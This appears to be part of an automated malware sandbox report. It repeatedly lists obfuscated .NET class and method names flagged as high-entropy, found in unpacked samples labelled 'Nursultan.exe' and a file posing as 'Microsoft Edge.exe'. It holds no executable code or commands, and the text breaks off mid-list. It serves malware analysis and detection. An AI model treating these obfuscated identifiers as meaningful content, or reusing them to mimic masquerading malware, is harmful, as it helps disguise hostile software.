Source: Microsoft Edge.exe.0.dr, OHxtQZ957hKI5.cs | High entropy of concatenated method names: '_3SgqvneaBE87U', 'b5YxyXaE6oIK9', '_9U2LRfqmfc9kC', 'JSYtqS7uhUtif', 'bInR62EIhQyZFc6F4ggdZVtkDQKWbQA3HLSRVWNIfV0rFsIebKGRk1scq8Ki8QDV0Z', 'TQtwBG1oHBkwPHGOJcZm5yztEZiI78SkggbvcIdxrs6mgOW1eWjtf2e2JAsLwhzSh7', 'teOSD6AnuZc0I8TEflyKYNWZ9sgCwJAa9LJPgWVGQwe1Xdylckukobz0ovoKm8w43AfXY6TjXwFvVS7gOpFFqborqtd2le0DaB', 'VUzVPnzTRa17a13IdHqGfdIHhyhoUOtDV7kbYU20bzinWsUdiqYjkkxQmd6CrI5HTinj1SSCzqO0nWkpkQ0qnrqd6EBh91KFY8', 'o5vInNRUxOlh9g2B7kJ9XEOAc6bEKfTACtUa2a4zIubra8YqmL2FTBEG2bXhLDNb3MJpWPb4MEcibxJcFHd8PIaqvKTjlWmhT6', 'P2j3FDkc3bPA5rQLlfiNLD32rhzUa9i9spsRXUVBtpgAvycpCBeO7tT3eTfdhG8UBKP0awPS2IPuqUfU4Ki5lgYYsUVme6YSZV'
Source: Microsoft Edge.exe.0.dr, oaBdkauKNCaML.cs | High entropy of concatenated method names: 'FQrc2LLQ6ouhv', 'OJ3ab2FppO7ZZ', 'ZBkd3NZTQuWaf', 'MGwGCKnG7fcbF', 'J4qNdZ9tR2yXl', '_8GDNxOJKjxREA', 'Hn6nzCaz0SlUz', 'hnV4KJv40mvfH', 'Vgb6hOQtzoCL3', 'I4teCO3peVHk2'
Source: Microsoft Edge.exe.0.dr, 0PFivgO7qv3FO.cs | High entropy of concatenated method names: 'pVhIOzDbICvXs', 'vO8Eh53MUGvwzW7iJct7uMacnED0wVGZTEntzQyw1EUHA5mcISVNdnlNbikhTFMULR', 'OUZJ1Cc4yqGHDRk108iufxtlmA0TYXvQ5oDrIGc3lZ5XqtHo8CXtpgYl9Rzka0uqdn', '_4nRTEYsG7T8ApAFG5Zf3zOfAPopOSjN8pkxH75laR8ZkiScud9Gm6WpfK1oxHlzqf6', '_6kKtDckZQIo3s8mllpDIokETcaLVJpdex4gHvnjvyTOgegy0JRCtVnI1GAoE8llHo3'
Source: Microsoft Edge.exe.0.dr, 4XGrZpv9Z38Gc.cs | High entropy of concatenated method names: 'MOPwIW0R07fM1', 'jNdANd8szwAta', 'RSPuqn2kFsUwp', 'bnCbfUC7Ig1zl', 'gRGXSeO4QPWkX', 'BntIUxBkGv7OS', 'fTSeHnVvfi3zN', '_5riJUWwBnV2mZ', 'zIfIEkk7yloMj', 'DsiXSixyLwTDL'
Source: Microsoft Edge.exe.0.dr, JEjSKPz8UTQEy.cs | High entropy of concatenated method names: 'tDI3Dph7HsgRE', '_61dO3StYaJ5lalwW4FBBppX4Lf8V0hL9TiJC7wv2O4jR1V6wqF18Wnro77UImHXeCLBd7kOVBq4LFLfU6rULY8lryYd4iZIGnQ', 'ofsGZPiMRJ17GLZCmGyFhg6qzgZVbzmC8rF3aZ9e4xNG3s7fKxxMmT3dkVfUh3ocY1Am474GJWwWlbCUTdGe8Z0rWIpJZkHZgc', 'TMb4axt9d53yU7oSQOsL8F30wqLq5cGh9lkYCLhatOgw6mBNfMq7x9ifhOd9yXWx34kEchsmJaaffb9xXGdSKvova3mDx8nnkR', 'cw4fAbsQhBwsAOUmfPzTm7Im7hEoYLpj7h6DdiR1chDIs17LcFK6ETaiXxNaE3E45V7j5LVJFwInymeJRc6InyZdtLIOTNq8cJ'
Source: Microsoft Edge.exe.0.dr, 8IQtID4yHRI2I.cs | High entropy of concatenated method names: 's5x2lUco1uh2F', 'JllsSjszFusOrh1r80WdehKzK447AX86KWm0WObcyR13ken6hkKJypliEIsKBKG9LLV9bPCjdx35almahfucfEaxI', '_0EyCxbfpY3wRxUmI3XJ6oyQQggDJ2giYI16MsPH2DAThC2Q4YglEEpxEyE4I5LTeElIBlkA29YY3lrFkensJ2xpRn', 'MOALjvURBajNzN1B8bhcrH6UgeebzgekkQUY7GEg9khEUGPZkHnnjjO84ytNUKyvytg2hRfn7ZeRyRFPsXQycN20w', 'zdb06ZbWaYhRC0FuRdeMXOfISatWl4gFUPuGFVNQT2czmXqcemNQpNg3iq2usbmQp3PfaVsi3fFfQyEzPydtTBKmQ', 'IIDYztLRxtISWQgWODkD1QWQHitlFYGx0byEdFwHoorGpjec9YsVdg7A9budCX0L9r6nXiQGB2ux5szvhM5WGcusI', 'wGkyX4N3b10y7zDTIYyFvKRiw19Hs1OnRKQsxB5mFYJXVPTTiTatUbehanm891fwgI422SaKqNW2Zcgn764HSMZD9', 'aTaDEm66wgUZ2PZLWu0YGha9a6Soc9QpUXUcPOXoCLY6Isa0KswTbymIxn0T3Bu2cofhVxVK3qU5Qso6L79dx6i49', '_5xPjqjnItAAhfCV8KStRnmYzgw7DP3gx0PTW8iKTDsHMWuZBVsh8wbsr8cg6DaiNC1qX9RBzRfW3K9DeVoeiLQf0m', 'Y8aXQY2wGU1JQgdPg54b3pIolW8tzLjCgzdVauHkZ8xeBTb5aVnDgNrsSSpGnC0xJduk93yKgdoNpQnFzRF61qOyp'
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.cs | High entropy of concatenated method names: 'PUlZjEb3CZzlIetxQMMADHk4yL430rc9AdvUieDCYv1dGhlCNPQ1CRbt5zYjp4e', 'UexpzpKm7MbCtMPODMd20cVrxDkoZRXij8RRlK97nBRNyW3LeDCiOLj2yr6yLwh', 'w5j3Lx33dXGJ0VeRd2cMjORyjTjYaE9EF8lqXD7Ir6VB3DF4AwAyOClvIRnJRQk', 'EQatjSGIjzQbxKRmNus8zFTj2Z0rkFO0vTbSUEGfLLUsCTsLUyH7cXqzEwUIUFB'
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, nZGo444ch7k6IvI2gABemVJZ7C7p0ns.cs | High entropy of concatenated method names: 'XVKezGs0XfryoEJC91WCQDjiwGcpCxE', 'ynHJHmD24cSRMl75asdd5cjliIL49jz', 'g4MgQeWvN20XOZUr1DJ9e5Uxw9beAal', 'EMmCKHhJAo11k37RyfPvI8G8GMzvs7aGt29aAGpkQ', 'Aw5PFkO0GtrTpsMRoSEB84uDjtcTmoDngkxSBpNBt', 'jwNgLdNd9xwoSfHTIM2R246gPGLfsEy1zOS3IJLmx', 'baQuwlZmpxg8Crooahesej86ChAWs2lSsfKp8ZNNU', 'a6adlCXmXYVK07yzd6iAr2ju1o9kD55W70cSknohV', 'CpOrF121Kgh1Dm0bvY4tEszrCihwKoHeAwpIiNfWp', 'CoOniJHTxjDTTUkU270vkmlgviZmHZE1SYeHgGLUl'
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 0vVj3nVvwrfXad36q7pufUCnYEJIFff4CxYvIQw.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'e0X4q26yWyAVTs5Ky8WxAOHbLSnGpwZxz2MsxNw6I723meC995WwNgSloLJaypH', 'I22vfTC3LN3Alzg6Lbq2PrrflD3PQpBuZvwDTaQ1OsmGCVt2YR6UtxsCT55vD1p', 'eCkrd1vkp3nvQVrjpxnnryyewPNJeXHJVFdIm8xql0xS1YqYNgWvPAhnn8TFA9v', 'O3QbuFU26GVLvaKJt18dwAXKU49dM9AuOmyMpCJ6kL5cgnt67J7Hc0aPE7KRLWw'
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, VxN1OfJ8oh9LomMsFLxBz90MySwAzdARgi9Puzepbn2iatVIrdWM4DkMC3wV8na6IyGxLRp.cs | High entropy of concatenated method names: 'VjGrrBN7FVxOJkynYai5vk5XfOiOfeVfEYZDuMqQ2PVYCBtNR0ooUg3HJycFnS1lo6pcv6J', 'FCeFTASiTAAsk90kV2XyKloVOhroucr72aCkfrrhWGVReurmDcS3i9mKYhsyl2OsuVQizTC', 'tNj7OZrGWuRhnbhj2pIfF5enJavUCNK15lXOnGgmBBboZOxXn5EFqqSjmAC1UhwPY884mJi', 'pgnKbMmkAtLEjFCWj3PcnJmbGD3BCBbUfPIkckWRemlFWbRwgFmbWQTvePmh3UeYcsXS3J5', 'eppLFjjNmBxsvZJq5liupoKV2Nr4iIg3AX7dU5FVzKWBmS3HIU3xLe9b9JytTT3RgRq7cVD', 'ojxpJGyvT8V1uSiYUHGBpnQjOl93HO8GQN3181FFswxIhjOchvUUrT2Wrn3smdaWuKdRLS8', 'gxR4M54uf5qMllhzOOzEg9M70ukxkTRiIuKG43Ut1qM2WBFBfA8vkJJifD5fhLqauEKYFoT', 'bMdtcYyQxXZNNUd4gu0CR3qzeuuORwqAOm9oYhNaTB9bEHMOOKhLCnnRtHM7QzW65c3kP5b', '_605U5Zvlchrf1gyFhfmden1JOu6GveCYV8y8efhZG8hHrUrpgVp9oPBc2VJH2KOsQKhcsZm', 'hZAAyUzPTKKeR'
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, jHz7doq0Y7v0T.cs | High entropy of concatenated method names: 'Sdqcbie0XL6fG', 'Leyz2Sb6pH9GX', 'q6xbM92DX6ZTO', 'GPyz3brKuyese', 'DLpLsbvZgXodz', 'dDHiJqsXrt5nP', 'p48KSRdVAVvdn', 'VJgv36TcdusOQ', 'TnScV4pWuEwaQ', 'aAXlR0XH2nH2E'
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, OHxtQZ957hKI5.cs | High entropy of concatenated method names: '_3SgqvneaBE87U', 'b5YxyXaE6oIK9', '_9U2LRfqmfc9kC', 'JSYtqS7uhUtif', 'bInR62EIhQyZFc6F4ggdZVtkDQKWbQA3HLSRVWNIfV0rFsIebKGRk1scq8Ki8QDV0Z', 'TQtwBG1oHBkwPHGOJcZm5yztEZiI78SkggbvcIdxrs6mgOW1eWjtf2e2JAsLwhzSh7', 'teOSD6AnuZc0I8TEflyKYNWZ9sgCwJAa9LJPgWVGQwe1Xdylckukobz0ovoKm8w43AfXY6TjXwFvVS7gOpFFqborqtd2le0DaB', 'VUzVPnzTRa17a13IdHqGfdIHhyhoUOtDV7kbYU20bzinWsUdiqYjkkxQmd6CrI5HTinj1SSCzqO0nWkpkQ0qnrqd6EBh91KFY8', 'o5vInNRUxOlh9g2B7kJ9XEOAc6bEKfTACtUa2a4zIubra8YqmL2FTBEG2bXhLDNb3MJpWPb4MEcibxJcFHd8PIaqvKTjlWmhT6', 'P2j3FDkc3bPA5rQLlfiNLD32rhzUa9i9spsRXUVBtpgAvycpCBeO7tT3eTfdhG8UBKP0awPS2IPuqUfU4Ki5lgYYsUVme6YSZV'
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, oaBdkauKNCaML.cs | High entropy of concatenated method names: 'FQrc2LLQ6ouhv', 'OJ3ab2FppO7ZZ', 'ZBkd3NZTQuWaf', 'MGwGCKnG7fcbF', 'J4qNdZ9tR2yXl', '_8GDNxOJKjxREA', 'Hn6nzCaz0SlUz', 'hnV4KJv40mvfH', 'Vgb6hOQtzoCL3', 'I4teCO3peVHk2'
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 0PFivgO7qv3FO.cs | High entropy of concatenated method names: 'pVhIOzDbICvXs', 'vO8Eh53MUGvwzW7iJct7uMacnED0wVGZTEntzQyw1EUHA5mcISVNdnlNbikhTFMULR', 'OUZJ1Cc4yqGHDRk108iufxtlmA0TYXvQ5oDrIGc3lZ5XqtHo8CXtpgYl9Rzka0uqdn', '_4nRTEYsG7T8ApAFG5Zf3zOfAPopOSjN8pkxH75laR8ZkiScud9Gm6WpfK1oxHlzqf6', '_6kKtDckZQIo3s8mllpDIokETcaLVJpdex4gHvnjvyTOgegy0JRCtVnI1GAoE8llHo3'
Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 4XGrZpv9Z38Gc.cs | High entropy of concatenated method names: 'MOPwIW0R07fM1', 'jNdANd8szwAta', 'RSPuqn2kFsUwp', 'bnCbfUC7Ig1zl', 'gRGXSeO4QPWkX', 'BntIUxBkGv7OS', 'fTSeHnVvfi3zN', '_5riJUWwBnV2mZ', 'zIfIEkk7yloMj', 'DsiXSixyLwTDL'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, JEjSKPz8UTQEy.csHigh entropy of concatenated method names: 'tDI3Dph7HsgRE', '_61dO3StYaJ5lalwW4FBBppX4Lf8V0hL9TiJC7wv2O4jR1V6wqF18Wnro77UImHXeCLBd7kOVBq4LFLfU6rULY8lryYd4iZIGnQ', 'ofsGZPiMRJ17GLZCmGyFhg6qzgZVbzmC8rF3aZ9e4xNG3s7fKxxMmT3dkVfUh3ocY1Am474GJWwWlbCUTdGe8Z0rWIpJZkHZgc', 'TMb4axt9d53yU7oSQOsL8F30wqLq5cGh9lkYCLhatOgw6mBNfMq7x9ifhOd9yXWx34kEchsmJaaffb9xXGdSKvova3mDx8nnkR', 'cw4fAbsQhBwsAOUmfPzTm7Im7hEoYLpj7h6DdiR1chDIs17LcFK6ETaiXxNaE3E45V7j5LVJFwInymeJRc6InyZdtLIOTNq8cJ'
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, 8IQtID4yHRI2I.csHigh entropy of concatenated method names: 's5x2lUco1uh2F', 'JllsSjszFusOrh1r80WdehKzK447AX86KWm0WObcyR13ken6hkKJypliEIsKBKG9LLV9bPCjdx35almahfucfEaxI', '_0EyCxbfpY3wRxUmI3XJ6oyQQggDJ2giYI16MsPH2DAThC2Q4YglEEpxEyE4I5LTeElIBlkA29YY3lrFkensJ2xpRn', 'MOALjvURBajNzN1B8bhcrH6UgeebzgekkQUY7GEg9khEUGPZkHnnjjO84ytNUKyvytg2hRfn7ZeRyRFPsXQycN20w', 'zdb06ZbWaYhRC0FuRdeMXOfISatWl4gFUPuGFVNQT2czmXqcemNQpNg3iq2usbmQp3PfaVsi3fFfQyEzPydtTBKmQ', 'IIDYztLRxtISWQgWODkD1QWQHitlFYGx0byEdFwHoorGpjec9YsVdg7A9budCX0L9r6nXiQGB2ux5szvhM5WGcusI', 'wGkyX4N3b10y7zDTIYyFvKRiw19Hs1OnRKQsxB5mFYJXVPTTiTatUbehanm891fwgI422SaKqNW2Zcgn764HSMZD9', 'aTaDEm66wgUZ2PZLWu0YGha9a6Soc9QpUXUcPOXoCLY6Isa0KswTbymIxn0T3Bu2cofhVxVK3qU5Qso6L79dx6i49', '_5xPjqjnItAAhfCV8KStRnmYzgw7DP3gx0PTW8iKTDsHMWuZBVsh8wbsr8cg6DaiNC1qX9RBzRfW3K9DeVoeiLQf0m', 'Y8aXQY2wGU1JQgdPg54b3pIolW8tzLjCgzdVauHkZ8xeBTb5aVnDgNrsSSpGnC0xJduk93yKgdoNpQnFzRF61qOyp'
                            Source: Microsoft Edge.3.dr, QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.csHigh entropy of concatenated method names: 'PUlZjEb3CZzlIetxQMMADHk4yL430rc9AdvUieDCYv1dGhlCNPQ1CRbt5zYjp4e', 'UexpzpKm7MbCtMPODMd20cVrxDkoZRXij8RRlK97nBRNyW3LeDCiOLj2yr6yLwh', 'w5j3Lx33dXGJ0VeRd2cMjORyjTjYaE9EF8lqXD7Ir6VB3DF4AwAyOClvIRnJRQk', 'EQatjSGIjzQbxKRmNus8zFTj2Z0rkFO0vTbSUEGfLLUsCTsLUyH7cXqzEwUIUFB'
                            Source: Microsoft Edge.3.dr, nZGo444ch7k6IvI2gABemVJZ7C7p0ns.csHigh entropy of concatenated method names: 'XVKezGs0XfryoEJC91WCQDjiwGcpCxE', 'ynHJHmD24cSRMl75asdd5cjliIL49jz', 'g4MgQeWvN20XOZUr1DJ9e5Uxw9beAal', 'EMmCKHhJAo11k37RyfPvI8G8GMzvs7aGt29aAGpkQ', 'Aw5PFkO0GtrTpsMRoSEB84uDjtcTmoDngkxSBpNBt', 'jwNgLdNd9xwoSfHTIM2R246gPGLfsEy1zOS3IJLmx', 'baQuwlZmpxg8Crooahesej86ChAWs2lSsfKp8ZNNU', 'a6adlCXmXYVK07yzd6iAr2ju1o9kD55W70cSknohV', 'CpOrF121Kgh1Dm0bvY4tEszrCihwKoHeAwpIiNfWp', 'CoOniJHTxjDTTUkU270vkmlgviZmHZE1SYeHgGLUl'
                            Source: Microsoft Edge.3.dr, 0vVj3nVvwrfXad36q7pufUCnYEJIFff4CxYvIQw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'e0X4q26yWyAVTs5Ky8WxAOHbLSnGpwZxz2MsxNw6I723meC995WwNgSloLJaypH', 'I22vfTC3LN3Alzg6Lbq2PrrflD3PQpBuZvwDTaQ1OsmGCVt2YR6UtxsCT55vD1p', 'eCkrd1vkp3nvQVrjpxnnryyewPNJeXHJVFdIm8xql0xS1YqYNgWvPAhnn8TFA9v', 'O3QbuFU26GVLvaKJt18dwAXKU49dM9AuOmyMpCJ6kL5cgnt67J7Hc0aPE7KRLWw'
                            Source: Microsoft Edge.3.dr, VxN1OfJ8oh9LomMsFLxBz90MySwAzdARgi9Puzepbn2iatVIrdWM4DkMC3wV8na6IyGxLRp.csHigh entropy of concatenated method names: 'VjGrrBN7FVxOJkynYai5vk5XfOiOfeVfEYZDuMqQ2PVYCBtNR0ooUg3HJycFnS1lo6pcv6J', 'FCeFTASiTAAsk90kV2XyKloVOhroucr72aCkfrrhWGVReurmDcS3i9mKYhsyl2OsuVQizTC', 'tNj7OZrGWuRhnbhj2pIfF5enJavUCNK15lXOnGgmBBboZOxXn5EFqqSjmAC1UhwPY884mJi', 'pgnKbMmkAtLEjFCWj3PcnJmbGD3BCBbUfPIkckWRemlFWbRwgFmbWQTvePmh3UeYcsXS3J5', 'eppLFjjNmBxsvZJq5liupoKV2Nr4iIg3AX7dU5FVzKWBmS3HIU3xLe9b9JytTT3RgRq7cVD', 'ojxpJGyvT8V1uSiYUHGBpnQjOl93HO8GQN3181FFswxIhjOchvUUrT2Wrn3smdaWuKdRLS8', 'gxR4M54uf5qMllhzOOzEg9M70ukxkTRiIuKG43Ut1qM2WBFBfA8vkJJifD5fhLqauEKYFoT', 'bMdtcYyQxXZNNUd4gu0CR3qzeuuORwqAOm9oYhNaTB9bEHMOOKhLCnnRtHM7QzW65c3kP5b', '_605U5Zvlchrf1gyFhfmden1JOu6GveCYV8y8efhZG8hHrUrpgVp9oPBc2VJH2KOsQKhcsZm', 'hZAAyUzPTKKeR'
                            Source: Microsoft Edge.3.dr, jHz7doq0Y7v0T.csHigh entropy of concatenated method names: 'Sdqcbie0XL6fG', 'Leyz2Sb6pH9GX', 'q6xbM92DX6ZTO', 'GPyz3brKuyese', 'DLpLsbvZgXodz', 'dDHiJqsXrt5nP', 'p48KSRdVAVvdn', 'VJgv36TcdusOQ', 'TnScV4pWuEwaQ', 'aAXlR0XH2nH2E'
                            Source: Microsoft Edge.3.dr, OHxtQZ957hKI5.csHigh entropy of concatenated method names: '_3SgqvneaBE87U', 'b5YxyXaE6oIK9', '_9U2LRfqmfc9kC', 'JSYtqS7uhUtif', 'bInR62EIhQyZFc6F4ggdZVtkDQKWbQA3HLSRVWNIfV0rFsIebKGRk1scq8Ki8QDV0Z', 'TQtwBG1oHBkwPHGOJcZm5yztEZiI78SkggbvcIdxrs6mgOW1eWjtf2e2JAsLwhzSh7', 'teOSD6AnuZc0I8TEflyKYNWZ9sgCwJAa9LJPgWVGQwe1Xdylckukobz0ovoKm8w43AfXY6TjXwFvVS7gOpFFqborqtd2le0DaB', 'VUzVPnzTRa17a13IdHqGfdIHhyhoUOtDV7kbYU20bzinWsUdiqYjkkxQmd6CrI5HTinj1SSCzqO0nWkpkQ0qnrqd6EBh91KFY8', 'o5vInNRUxOlh9g2B7kJ9XEOAc6bEKfTACtUa2a4zIubra8YqmL2FTBEG2bXhLDNb3MJpWPb4MEcibxJcFHd8PIaqvKTjlWmhT6', 'P2j3FDkc3bPA5rQLlfiNLD32rhzUa9i9spsRXUVBtpgAvycpCBeO7tT3eTfdhG8UBKP0awPS2IPuqUfU4Ki5lgYYsUVme6YSZV'
                            Source: Microsoft Edge.3.dr, oaBdkauKNCaML.csHigh entropy of concatenated method names: 'FQrc2LLQ6ouhv', 'OJ3ab2FppO7ZZ', 'ZBkd3NZTQuWaf', 'MGwGCKnG7fcbF', 'J4qNdZ9tR2yXl', '_8GDNxOJKjxREA', 'Hn6nzCaz0SlUz', 'hnV4KJv40mvfH', 'Vgb6hOQtzoCL3', 'I4teCO3peVHk2'
                            Source: Microsoft Edge.3.dr, 0PFivgO7qv3FO.csHigh entropy of concatenated method names: 'pVhIOzDbICvXs', 'vO8Eh53MUGvwzW7iJct7uMacnED0wVGZTEntzQyw1EUHA5mcISVNdnlNbikhTFMULR', 'OUZJ1Cc4yqGHDRk108iufxtlmA0TYXvQ5oDrIGc3lZ5XqtHo8CXtpgYl9Rzka0uqdn', '_4nRTEYsG7T8ApAFG5Zf3zOfAPopOSjN8pkxH75laR8ZkiScud9Gm6WpfK1oxHlzqf6', '_6kKtDckZQIo3s8mllpDIokETcaLVJpdex4gHvnjvyTOgegy0JRCtVnI1GAoE8llHo3'
                            Source: Microsoft Edge.3.dr, 4XGrZpv9Z38Gc.csHigh entropy of concatenated method names: 'MOPwIW0R07fM1', 'jNdANd8szwAta', 'RSPuqn2kFsUwp', 'bnCbfUC7Ig1zl', 'gRGXSeO4QPWkX', 'BntIUxBkGv7OS', 'fTSeHnVvfi3zN', '_5riJUWwBnV2mZ', 'zIfIEkk7yloMj', 'DsiXSixyLwTDL'
                            Source: Microsoft Edge.3.dr, JEjSKPz8UTQEy.csHigh entropy of concatenated method names: 'tDI3Dph7HsgRE', '_61dO3StYaJ5lalwW4FBBppX4Lf8V0hL9TiJC7wv2O4jR1V6wqF18Wnro77UImHXeCLBd7kOVBq4LFLfU6rULY8lryYd4iZIGnQ', 'ofsGZPiMRJ17GLZCmGyFhg6qzgZVbzmC8rF3aZ9e4xNG3s7fKxxMmT3dkVfUh3ocY1Am474GJWwWlbCUTdGe8Z0rWIpJZkHZgc', 'TMb4axt9d53yU7oSQOsL8F30wqLq5cGh9lkYCLhatOgw6mBNfMq7x9ifhOd9yXWx34kEchsmJaaffb9xXGdSKvova3mDx8nnkR', 'cw4fAbsQhBwsAOUmfPzTm7Im7hEoYLpj7h6DdiR1chDIs17LcFK6ETaiXxNaE3E45V7j5LVJFwInymeJRc6InyZdtLIOTNq8cJ'
                            Source: Microsoft Edge.3.dr, 8IQtID4yHRI2I.csHigh entropy of concatenated method names: 's5x2lUco1uh2F', 'JllsSjszFusOrh1r80WdehKzK447AX86KWm0WObcyR13ken6hkKJypliEIsKBKG9LLV9bPCjdx35almahfucfEaxI', '_0EyCxbfpY3wRxUmI3XJ6oyQQggDJ2giYI16MsPH2DAThC2Q4YglEEpxEyE4I5LTeElIBlkA29YY3lrFkensJ2xpRn', 'MOALjvURBajNzN1B8bhcrH6UgeebzgekkQUY7GEg9khEUGPZkHnnjjO84ytNUKyvytg2hRfn7ZeRyRFPsXQycN20w', 'zdb06ZbWaYhRC0FuRdeMXOfISatWl4gFUPuGFVNQT2czmXqcemNQpNg3iq2usbmQp3PfaVsi3fFfQyEzPydtTBKmQ', 'IIDYztLRxtISWQgWODkD1QWQHitlFYGx0byEdFwHoorGpjec9YsVdg7A9budCX0L9r6nXiQGB2ux5szvhM5WGcusI', 'wGkyX4N3b10y7zDTIYyFvKRiw19Hs1OnRKQsxB5mFYJXVPTTiTatUbehanm891fwgI422SaKqNW2Zcgn764HSMZD9', 'aTaDEm66wgUZ2PZLWu0YGha9a6Soc9QpUXUcPOXoCLY6Isa0KswTbymIxn0T3Bu2cofhVxVK3qU5Qso6L79dx6i49', '_5xPjqjnItAAhfCV8KStRnmYzgw7DP3gx0PTW8iKTDsHMWuZBVsh8wbsr8cg6DaiNC1qX9RBzRfW3K9DeVoeiLQf0m', 'Y8aXQY2wGU1JQgdPg54b3pIolW8tzLjCgzdVauHkZ8xeBTb5aVnDgNrsSSpGnC0xJduk93yKgdoNpQnFzRF61qOyp'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, QjjNjusK66JsSbH7DqWLTcMT5eoaIlqlSu7OSPll79v3YPaTkhCmGOfXfhPXkx5Tjl0WPkq.csHigh entropy of concatenated method names: 'PUlZjEb3CZzlIetxQMMADHk4yL430rc9AdvUieDCYv1dGhlCNPQ1CRbt5zYjp4e', 'UexpzpKm7MbCtMPODMd20cVrxDkoZRXij8RRlK97nBRNyW3LeDCiOLj2yr6yLwh', 'w5j3Lx33dXGJ0VeRd2cMjORyjTjYaE9EF8lqXD7Ir6VB3DF4AwAyOClvIRnJRQk', 'EQatjSGIjzQbxKRmNus8zFTj2Z0rkFO0vTbSUEGfLLUsCTsLUyH7cXqzEwUIUFB'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, nZGo444ch7k6IvI2gABemVJZ7C7p0ns.csHigh entropy of concatenated method names: 'XVKezGs0XfryoEJC91WCQDjiwGcpCxE', 'ynHJHmD24cSRMl75asdd5cjliIL49jz', 'g4MgQeWvN20XOZUr1DJ9e5Uxw9beAal', 'EMmCKHhJAo11k37RyfPvI8G8GMzvs7aGt29aAGpkQ', 'Aw5PFkO0GtrTpsMRoSEB84uDjtcTmoDngkxSBpNBt', 'jwNgLdNd9xwoSfHTIM2R246gPGLfsEy1zOS3IJLmx', 'baQuwlZmpxg8Crooahesej86ChAWs2lSsfKp8ZNNU', 'a6adlCXmXYVK07yzd6iAr2ju1o9kD55W70cSknohV', 'CpOrF121Kgh1Dm0bvY4tEszrCihwKoHeAwpIiNfWp', 'CoOniJHTxjDTTUkU270vkmlgviZmHZE1SYeHgGLUl'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, 0vVj3nVvwrfXad36q7pufUCnYEJIFff4CxYvIQw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'e0X4q26yWyAVTs5Ky8WxAOHbLSnGpwZxz2MsxNw6I723meC995WwNgSloLJaypH', 'I22vfTC3LN3Alzg6Lbq2PrrflD3PQpBuZvwDTaQ1OsmGCVt2YR6UtxsCT55vD1p', 'eCkrd1vkp3nvQVrjpxnnryyewPNJeXHJVFdIm8xql0xS1YqYNgWvPAhnn8TFA9v', 'O3QbuFU26GVLvaKJt18dwAXKU49dM9AuOmyMpCJ6kL5cgnt67J7Hc0aPE7KRLWw'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, VxN1OfJ8oh9LomMsFLxBz90MySwAzdARgi9Puzepbn2iatVIrdWM4DkMC3wV8na6IyGxLRp.csHigh entropy of concatenated method names: 'VjGrrBN7FVxOJkynYai5vk5XfOiOfeVfEYZDuMqQ2PVYCBtNR0ooUg3HJycFnS1lo6pcv6J', 'FCeFTASiTAAsk90kV2XyKloVOhroucr72aCkfrrhWGVReurmDcS3i9mKYhsyl2OsuVQizTC', 'tNj7OZrGWuRhnbhj2pIfF5enJavUCNK15lXOnGgmBBboZOxXn5EFqqSjmAC1UhwPY884mJi', 'pgnKbMmkAtLEjFCWj3PcnJmbGD3BCBbUfPIkckWRemlFWbRwgFmbWQTvePmh3UeYcsXS3J5', 'eppLFjjNmBxsvZJq5liupoKV2Nr4iIg3AX7dU5FVzKWBmS3HIU3xLe9b9JytTT3RgRq7cVD', 'ojxpJGyvT8V1uSiYUHGBpnQjOl93HO8GQN3181FFswxIhjOchvUUrT2Wrn3smdaWuKdRLS8', 'gxR4M54uf5qMllhzOOzEg9M70ukxkTRiIuKG43Ut1qM2WBFBfA8vkJJifD5fhLqauEKYFoT', 'bMdtcYyQxXZNNUd4gu0CR3qzeuuORwqAOm9oYhNaTB9bEHMOOKhLCnnRtHM7QzW65c3kP5b', '_605U5Zvlchrf1gyFhfmden1JOu6GveCYV8y8efhZG8hHrUrpgVp9oPBc2VJH2KOsQKhcsZm', 'hZAAyUzPTKKeR'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, jHz7doq0Y7v0T.csHigh entropy of concatenated method names: 'Sdqcbie0XL6fG', 'Leyz2Sb6pH9GX', 'q6xbM92DX6ZTO', 'GPyz3brKuyese', 'DLpLsbvZgXodz', 'dDHiJqsXrt5nP', 'p48KSRdVAVvdn', 'VJgv36TcdusOQ', 'TnScV4pWuEwaQ', 'aAXlR0XH2nH2E'
                            Source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, OHxtQZ957hKI5.csHigh entropy of concatenated method names: '_3SgqvneaBE87U', 'b5YxyXaE6oIK9', '_9U2LRfqmfc9kC', 'JSYtqS7uhUtif', 'bInR62EIhQyZFc6F4ggdZVtkDQKWbQA3HLSRVWNIfV0rFsIebKGRk1scq8Ki8QDV0Z', 'TQtwBG1oHBkwPHGOJcZm5yztEZiI78SkggbvcIdxrs6mgOW1eWjtf2e2JAsLwhzSh7', 'teOSD6AnuZc0I8TEflyKYNWZ9sgCwJAa9LJPgWVGQwe1Xdylckukobz0ovoKm8w43AfXY6TjXwFvVS7gOpFFqborqtd2le0DaB', 'VUzVPnzTRa17a13IdHqGfdIHhyhoUOtDV7kbYU20bzinWsUdiqYjkkxQmd6CrI5HTinj1SSCzqO0nWkpkQ0qnrqd6EBh91KFY8', 